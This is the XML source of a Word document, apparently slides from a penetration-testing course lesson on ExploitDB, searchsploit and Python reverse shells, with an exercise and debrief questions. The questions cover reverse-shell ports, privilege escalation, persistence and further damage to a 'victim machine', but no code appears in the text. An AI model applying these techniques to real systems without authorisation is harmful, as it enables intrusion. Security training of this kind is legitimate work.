      </w:r>
    </w:p>
    <w:p w14:paraId="54110ED4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Moving the cursor with left-and-right arrows produces escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72ACC4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="1644"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="42"/>
        </w:rPr>
        <w:t>sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A9533" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>No Tab auto-completion functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A8FA1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="454" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>No visible prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470505FB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E818720" wp14:editId="4A29C7D7">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="267199" name="Picture 26719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7199" name="Picture 267199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363980" cy="1036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C336A4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="400" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A quick magic trick helps fix these issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13FDDB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="285" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE46EA1" wp14:editId="3974E311">
            <wp:extent cx="11096625" cy="4943475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340851" name="Picture 34085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851" name="Picture 340851"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId200"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="11096625" cy="4943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FE90F3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command and control on the victim machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500BA4AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You have flexible remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B957FD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="3"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both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20704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5437CF14" wp14:editId="7C100C2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10058400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2581275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2133600" cy="2695575"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="339987" name="Group 33998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33600" cy="2695575"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2133600" cy="2695575"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340853" name="Picture 340853"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20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33575" cy="260985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80584" name="Rectangle 280584"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1943100" y="2571750"/>
                            <a:ext cx="253365" cy="16468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38872FF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:t>Oc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437CF14" id="Group 339987" o:spid="_x0000_s1069" style="position:absolute;left:0;text-align:left;margin-left:11in;margin-top:203.25pt;width:168pt;height:212.25pt;z-index:251720704;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="21336,26955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">
                <v:shape id="Picture 340853" o:spid="_x0000_s1070" type="#_x0000_t75" style="position:absolute;width:19335;height:260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">
                  <v:imagedata r:id="rId202" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 280584" o:spid="_x0000_s1071" style="position:absolute;left:19431;top:25717;width:2533;height:16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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="338872FF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:t>Oct</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:wrap type="topAndBottom" anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>Now what?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06716845" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB0195B" wp14:editId="14C9670B">
            <wp:extent cx="8686800" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340854" name="Picture 34085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854" name="Picture 340854"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId203"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8686800" cy="3171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B9CCFF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="8918"/>
          <w:tab w:val="right" w:pos="17835"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="-585"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ultimately, try to escalate your privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D82C034" wp14:editId="6C144F00">
            <wp:extent cx="1447800" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="291665" name="Picture 29166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1665" name="Picture 291665"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId204"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1447800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FA39BD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:t>Privilege Escalation can be done in many, many ways.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385DF1A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="339" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Outlets for privilege escalation will be visited in future iterations of this course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CCC150" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="198" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You could use another exploit, take advantage of different services, abuse some misconfiguration . the list goes on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2720DDE0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="205" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>If you are interested, explore these resources to get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve"> a better idea of what to do next once you have a shell on a remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC9C9D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/rebootuser/LinEnum https://blog.g0tmi1 k.com/201 1 /08/basic-lin ux-privilege-escalation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A411365" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="16350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6227911C" wp14:editId="22F6BE68">
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="292317" name="Picture 2923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2317" name="Picture 292317"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr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91D3CB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15540" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF37073" wp14:editId="0C2DCF5C">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="292381" name="Picture 29238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2381" name="Picture 292381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409700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77053D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="93"/>
        <w:ind w:left="445"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercise: Python and ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710BD9F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284722AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="400" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>After completing this ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>ercise, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0A1D3D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Interpret exploit code and Metasploit modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10978F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="935" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="5478BF55" wp14:editId="37510196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28975" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340856" name="Picture 34085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856" name="Picture 340856"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3228975" cy="5600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2"/>
        </w:rPr>
        <w:t>Execute exploit on target machine with Python • Perform privilege escalation on target with Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06932018" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542F5B6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="415" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This exercise will take approximately 3 hours to complete, with 30-45 minutes to review answers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D91B6A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="289"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD7240" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>General Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114B253" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="39B6ABF0" wp14:editId="2FEEE4DD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8500" cy="5593081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="295648" name="Picture 29564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5648" name="Picture 295648"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207"/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559308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2"/>
        </w:rPr>
        <w:t>How did you feel about t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>his procedure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A1961" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="213" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Were there any areas in particular where you had difficulty?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C8890" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Do you understand how this relates to the work you will be doing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FCC7B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="296"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A49886" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Specific Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C20AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="7ACEC17B" wp14:editId="68E18BA9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8500" cy="5593081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="296899" name="Picture 29689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899" name="Picture 296899"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207"/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559308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4"/>
        </w:rPr>
        <w:t>What location on the file system did you place your PI-IP code? Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE5813" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>What port did you choose for your reverse shell? Are they any ports that you would not be able to use?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885B8D4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Once you have access to the machine, what other damage could you do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D107462" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="296"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4DA580" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Specifi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>c Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2E76F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="28" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="2FB7B587" wp14:editId="35BBBB6F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8500" cy="5593081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="298028" name="Picture 29802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8028" name="Picture 298028"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207"/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559308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4"/>
        </w:rPr>
        <w:t>How else can you abuse the Python script to escalate your privileges?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02054F31" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>We did not work to establish persistence. What are potential options we could explore to set up persistence?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBB151" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="157"/>
        <w:ind w:left="430"/>
      </w:pPr>
      <w:r>
        <w:t>Lesson Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E31D7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="198" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="415" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>In this lesson we have discussed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791AE589" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="66" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>ExploitDB intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>duction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4B035" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B48A969" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="308" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97F7E9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
